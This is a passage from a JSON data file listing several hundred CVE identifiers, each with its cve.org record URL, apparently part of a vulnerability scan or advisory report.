"name": "CVE-2025-38711",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38711"
},
{
"name": "CVE-2025-38487",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38487"
},
{
"name": "CVE-2024-9681",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9681"
},
{
"name": "CVE-2025-58190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58190"
},
{
"name": "CVE-2025-37775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37775"
},
{
"name": "CVE-2025-38335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38335"
},
{
"name": "CVE-2024-11168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
},
{
"name": "CVE-2025-38304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38304"
},
{
"name": "CVE-2025-37892",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37892"
},
{
"name": "CVE-2025-38100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38100"
},
{
"name": "CVE-2025-37859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37859"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2025-1372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1372"
},
{
"name": "CVE-2025-8851",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8851"
},
{
"name": "CVE-2025-38043",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38043"
},
{
"name": "CVE-2025-68973",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68973"
},
{
"name": "CVE-2025-38471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38471"
},
{
"name": "CVE-2025-38520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38520"
},
{
"name": "CVE-2025-37792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37792"
},
{
"name": "CVE-2022-3626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3626"
},
{
"name": "CVE-2024-28834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28834"
},
{
"name": "CVE-2021-38604",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38604"
},
{
"name": "CVE-2001-1268",
"url": "https://www.cve.org/CVERecord?id=CVE-2001-1268"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2025-38108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38108"
},
{
"name": "CVE-2025-38230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38230"
},
{
"name": "CVE-2025-38229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38229"
},
{
"name": "CVE-2023-46218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46218"
},
{
"name": "CVE-2025-40055",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40055"
},
{
"name": "CVE-2025-38158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38158"
},
{
"name": "CVE-2025-37872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37872"
},
{
"name": "CVE-2025-9714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9714"
},
{
"name": "CVE-2025-38588",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38588"
},
{
"name": "CVE-2026-22801",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22801"
},
{
"name": "CVE-2025-39876",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39876"
},
{
"name": "CVE-2025-40029",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40029"
},
{
"name": "CVE-2025-38279",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38279"
},
{
"name": "CVE-2025-38561",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38561"
},
{
"name": "CVE-2014-8141",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8141"
},
{
"name": "CVE-2025-38574",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38574"
},
{
"name": "CVE-2022-2255",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2255"
},
{
"name": "CVE-2025-10148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10148"
},
{
"name": "CVE-2025-25724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
},
{
"name": "CVE-2025-27818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27818"
},
{
"name": "CVE-2025-14087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14087"
},
{
"name": "CVE-2025-40048",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40048"
},
{
"name": "CVE-2025-5222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5222"
},
{
"name": "CVE-2025-38147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38147"
},
{
"name": "CVE-2023-6780",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6780"
},
{
"name": "CVE-2022-48468",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48468"
},
{
"name": "CVE-2025-23155",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23155"
},
{
"name": "CVE-2025-38286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38286"
},
{
"name": "CVE-2025-40219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40219"
},
{
"name": "CVE-2025-39757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39757"
},
{
"name": "CVE-2025-38501",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38501"
},
{
"name": "CVE-2025-38474",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38474"
},
{
"name": "CVE-2025-7545",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7545"
},
{
"name": "CVE-2025-37979",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37979"
},
{
"name": "CVE-2025-40043",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40043"
},
{
"name": "CVE-2024-3220",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3220"
},
{
"name": "CVE-2022-3599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3599"
},
{
"name": "CVE-2025-37777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37777"
},
{
"name": "CVE-2021-39537",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39537"
},
{
"name": "CVE-2025-39772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39772"
},
{
"name": "CVE-2025-37936",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37936"
},
{
"name": "CVE-2015-4787",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4787"
},
{
"name": "CVE-2022-27781",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27781"
},
{
"name": "CVE-2025-38601",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38601"
},
{
"name": "CVE-2021-22925",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22925"
},
{
"name": "CVE-2025-37766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37766"
},
{
"name": "CVE-2022-47008",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47008"
},
{
"name": "CVE-2023-0796",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0796"
},
{
"name": "CVE-2025-38104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38104"
},
{
"name": "CVE-2025-37844",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37844"
},
{
"name": "CVE-2016-0682",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0682"
},
{
"name": "CVE-2025-21931",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21931"
},
{
"name": "CVE-2025-37871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37871"
},
{
"name": "CVE-2025-37778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37778"
},
{
"name": "CVE-2025-39716",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39716"
},
{
"name": "CVE-2025-39702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39702"
},
{
"name": "CVE-2025-39973",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39973"
},
{
"name": "CVE-2025-38515",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38515"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2025-38645",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38645"
},
{
"name": "CVE-2025-8941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8941"
},
{
"name": "CVE-2023-52425",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52425"
},
{
"name": "CVE-2025-38163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38163"
},
{
"name": "CVE-2025-22126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22126"
},
{
"name": "CVE-2025-38444",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38444"
},
{
"name": "CVE-2025-38109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38109"
},
{
"name": "CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"name": "CVE-2025-39779",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39779"
},
{
"name": "CVE-2025-66866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66866"
},
{
"name": "CVE-2025-28164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-28164"
},
{
"name": "CVE-2025-37755",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37755"
},
{
"name": "CVE-2025-39685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39685"
},
{
"name": "CVE-2025-38660",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38660"
},
{
"name": "CVE-2025-39761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39761"
},
{
"name": "CVE-2025-39943",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39943"
},
{
"name": "CVE-2025-39945",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39945"
},
{
"name": "CVE-2025-11840",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11840"
},
{
"name": "CVE-2025-11731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11731"
},
{
"name": "CVE-2024-33602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33602"
},
{
"name": "CVE-2022-47629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47629"
},
{
"name": "CVE-2025-39883",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39883"
},
{
"name": "CVE-2025-39720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39720"
},
{
"name": "CVE-2025-38624",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38624"
},
{
"name": "CVE-2025-38388",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38388"
},
{
"name": "CVE-2022-48554",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48554"
},
{
"name": "CVE-2022-0563",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0563"
},
{
"name": "CVE-2025-38157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38157"
},
{
"name": "CVE-2025-4056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4056"
},
{
"name": "CVE-2025-37790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37790"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2020-29562",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29562"
},
{
"name": "CVE-2025-38417",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38417"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-39746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39746"
},
{
"name": "CVE-2015-4776",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4776"
},
{
"name": "CVE-2025-38323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38323"
},
{
"name": "CVE-2025-40019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40019"
},
{
"name": "CVE-2017-3616",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3616"
},
{
"name": "CVE-2025-38208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38208"
},
{
"name": "CVE-2025-27817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27817"
},
{
"name": "CVE-2023-30086",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30086"
},
{
"name": "CVE-2025-40240",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
},
{
"name": "CVE-2025-38219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38219"
},
{
"name": "CVE-2025-39889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39889"
},
{
"name": "CVE-2015-4785",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4785"
},
{
"name": "CVE-2025-38099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38099"
},
{
"name": "CVE-2025-38524",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38524"
},
{
"name": "CVE-2025-38466",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38466"
},
{
"name": "CVE-2025-37758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37758"
},
{
"name": "CVE-2022-32208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32208"
},
{
"name": "CVE-2025-40081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40081"
},
{
"name": "CVE-2025-38087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38087"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2025-1181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1181"
},
{
"name": "CVE-2022-41409",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
},
{
"name": "CVE-2023-25586",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25586"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-58011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58011"
},
{
"name": "CVE-2025-12084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
},
{
"name": "CVE-2025-38039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38039"
},
{
"name": "CVE-2017-20052",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-20052"
},
{
"name": "CVE-2025-40026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40026"
},
{
"name": "CVE-2025-40153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40153"
},
{
"name": "CVE-2025-0840",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0840"
},
{
"name": "CVE-2022-2057",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2057"
},
{
"name": "CVE-2023-45853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
},
{
"name": "CVE-2025-38595",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38595"
},
{
"name": "CVE-2024-47611",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47611"
},
{
"name": "CVE-2025-38626",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38626"
},
{
"name": "CVE-2025-40121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40121"
},
{
"name": "CVE-2025-45582",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
},
{
"name": "CVE-2025-11468",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
},
{
"name": "CVE-2025-40204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40204"
},
{
"name": "CVE-2025-37852",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37852"
},
{
"name": "CVE-2025-37841",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37841"
},
{
"name": "CVE-2025-40171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40171"
},
{
"name": "CVE-2025-37918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37918"
},
{
"name": "CVE-2025-37917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37917"
},
{
"name": "CVE-2025-38290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38290"
},
{
"name": "CVE-2021-22901",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22901"
},
{
"name": "CVE-2025-38063",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38063"
},
{
"name": "CVE-2021-3998",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3998"
},
{
"name": "CVE-2025-1179",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1179"
},
{
"name": "CVE-2025-37770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37770"
},
{
"name": "CVE-2025-37773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37773"
},
{
"name": "CVE-2023-26965",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26965"
},
{
"name": "CVE-2023-2602",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2602"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2017-10140",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-10140"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2025-38578",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38578"
},
{
"name": "CVE-2025-38675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38675"
},
{
"name": "CVE-2025-39911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39911"
},
{
"name": "CVE-2025-69419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69419"
},
{
"name": "CVE-2025-6052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6052"
},
{
"name": "CVE-2025-38646",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38646"
},
{
"name": "CVE-2025-38491",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38491"
},
{
"name": "CVE-2025-38708",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38708"
},
{
"name": "CVE-2025-37961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37961"
},
{
"name": "CVE-2025-40125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40125"
},
{
"name": "CVE-2023-52426",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52426"
},
{
"name": "CVE-2025-38313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38313"
},
{
"name": "CVE-2025-38336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38336"
},
{
"name": "CVE-2025-40349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40349"
},
{
"name": "CVE-2025-6075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6075"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2022-2058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2058"
},
{
"name": "CVE-2025-38644",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38644"
},
{
"name": "CVE-2025-38692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38692"
},
{
"name": "CVE-2025-38061",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38061"
},
{
"name": "CVE-2024-45492",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45492"
},
{
"name": "CVE-2025-37983",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37983"
},
{
"name": "CVE-2015-4764",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4764"
},
{
"name": "CVE-2025-38127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38127"
},
{
"name": "CVE-2026-22715",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22715"
},
{
"name": "CVE-2020-1752",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-1752"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2025-37784",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37784"
},
{
"name": "CVE-2025-39701",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39701"
},
{
"name": "CVE-2015-4779",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4779"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2025-40187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40187"
},
{
"name": "CVE-2025-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37920"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2025-37815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37815"
},
{
"name": "CVE-2025-38686",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38686"
},
{
"name": "CVE-2025-37819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37819"
},
{
"name": "CVE-2025-49794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49794"
},
{
"name": "CVE-2024-57970",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57970"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2024-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
},
{
"name": "CVE-2022-32207",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
},
{
"name": "CVE-2025-40092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40092"
},
{
"name": "CVE-2022-47007",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47007"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2025-61731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61731"
},
{
"name": "CVE-2022-3627",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3627"
},
{
"name": "CVE-2025-38609",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38609"
},
{
"name": "CVE-2025-39967",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39967"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2025-38463",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38463"
},
{
"name": "CVE-2025-40115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40115"
},
{
"name": "CVE-2023-25433",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25433"
},
{
"name": "CVE-2025-38112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38112"
},
{
"name": "CVE-2025-66863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66863"
},
{
"name": "CVE-2015-4780",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4780"
},
{
"name": "CVE-2025-38521",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38521"
},
{
"name": "CVE-2025-38023",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38023"
},
{
"name": "CVE-2025-39709",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39709"
},
{
"name": "CVE-2025-38282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38282"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2025-38215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38215"
},
{
"name": "CVE-2022-3598",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3598"
},
{
"name": "CVE-2023-0798",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0798"
},
{
"name": "CVE-2025-39787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39787"
},
{
"name": "CVE-2025-37943",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37943"
},
{
"name": "CVE-2025-37745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37745"
},
{
"name": "CVE-2025-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8176"
},
{
"name": "CVE-2025-13837",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
},
{
"name": "CVE-2025-39731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39731"
},
{
"name": "CVE-2025-38734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38734"
},
{
"name": "CVE-2025-38653",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38653"
},
{
"name": "CVE-2025-38571",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38571"
},
{
"name": "CVE-2025-37789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37789"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2022-38476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38476"
},
{
"name": "CVE-2021-45078",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45078"
},
{
"name": "CVE-2025-38695",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38695"
},
{
"name": "CVE-2022-3515",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3515"
},
{
"name": "CVE-2025-38004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38004"
},
{
"name": "CVE-2025-39749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39749"
},
{
"name": "CVE-2025-39949",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39949"
},
{
"name": "CVE-2015-7696",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7696"
},
{
"name": "CVE-2022-4285",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4285"
},
{
"name": "CVE-2025-38387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38387"
},
{
"name": "CVE-2015-4754",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4754"
},
{
"name": "CVE-2025-38362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38362"
},
{
"name": "CVE-2022-27776",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27776"
},
{
"name": "CVE-2023-45322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
},
{
"name": "CVE-2025-40173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40173"
},
{
"name": "CVE-2025-37924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37924"
},
{
"name": "CVE-2026-22716",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22716"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2025-38371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38371"
},
{
"name": "CVE-2023-2731",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2731"
},
{
"name": "CVE-2025-58767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58767"
},
{
"name": "CVE-2024-56538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56538"
},
{
"name": "CVE-2025-39923",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39923"
},
{
"name": "CVE-2021-35939",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35939"
},
{
"name": "CVE-2025-38445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38445"
},
{
"name": "CVE-2025-38456",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38456"
},
{
"name": "CVE-2025-38538",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38538"
},
{
"name": "CVE-2024-38819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38819"
},
{
"name": "CVE-2023-0803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0803"
},
{
"name": "CVE-2025-37867",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37867"
},
{
"name": "CVE-2025-23160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23160"
},
{
"name": "CVE-2025-6176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6176"
},
{
"name": "CVE-2022-47695",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47695"
},
{
"name": "CVE-2025-38295",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38295"
},
{
"name": "CVE-2025-15367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15367"
},
{
"name": "CVE-2025-38461",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38461"
},
{
"name": "CVE-2025-37857",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37857"
},
{
"name": "CVE-2023-30774",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30774"
},
{
"name": "CVE-2024-13176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
},
{
"name": "CVE-2025-37842",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37842"
},
{
"name": "CVE-2025-39953",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39953"
},
{
"name": "CVE-2022-50458",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50458"
},
{
"name": "CVE-2025-15467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15467"
},
{
"name": "CVE-2024-58251",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58251"
},
{
